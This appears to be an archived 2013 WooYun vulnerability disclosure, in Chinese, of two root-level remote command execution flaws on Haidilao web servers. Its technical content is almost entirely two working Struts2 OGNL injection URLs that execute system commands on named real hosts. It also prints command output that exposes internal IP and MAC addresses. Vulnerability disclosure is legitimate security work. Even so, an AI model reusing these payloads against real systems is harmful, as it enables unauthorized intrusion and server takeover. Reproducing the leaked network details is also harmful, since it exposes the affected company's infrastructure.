乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-08-01: 细节已通知厂商并且等待厂商处理中 2013-08-02: 厂商已经确认,细节仅向厂商公开 2013-08-12: 细节向核心白帽子及相关领域专家公开 2013-08-22: 细节向普通白帽子公开 2013-09-01: 细节向实习白帽子公开 2013-09-15: 细节向公众公开
海底捞两处远程命令执行(root)可shell
1#
http://cater.haidilao.com/Cater/store/liststore.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'ifconfig'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
ROOT
ifconfig
eth0 Link encap:Ethernet HWaddr 70:7B:E8:EC:5C:C4 inet addr:172.16.253.15 Bcast:172.16.253.255 Mask:255.255.255.0 inet6 addr: fe80::727b:e8ff:feec:5cc4/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1243550800 errors:0 dropped:0 overruns:0 frame:0 TX packets:1365869516 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:644931179046 (615054.3 Mb) TX bytes:1034817341356 (986878.7 Mb) Interrupt:58 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:903 errors:0 dropped:0 overruns:0 frame:0 TX packets:903 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:58063 (56.7 Kb) TX bytes:58063 (56.7 Kb)
2#
http://vae.haidilao.com:8680/ecitySSO/sso/beforeLogin.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
未深入
补丁
危害等级:中
漏洞Rank:10
确认时间:2013-08-02 09:58
暂无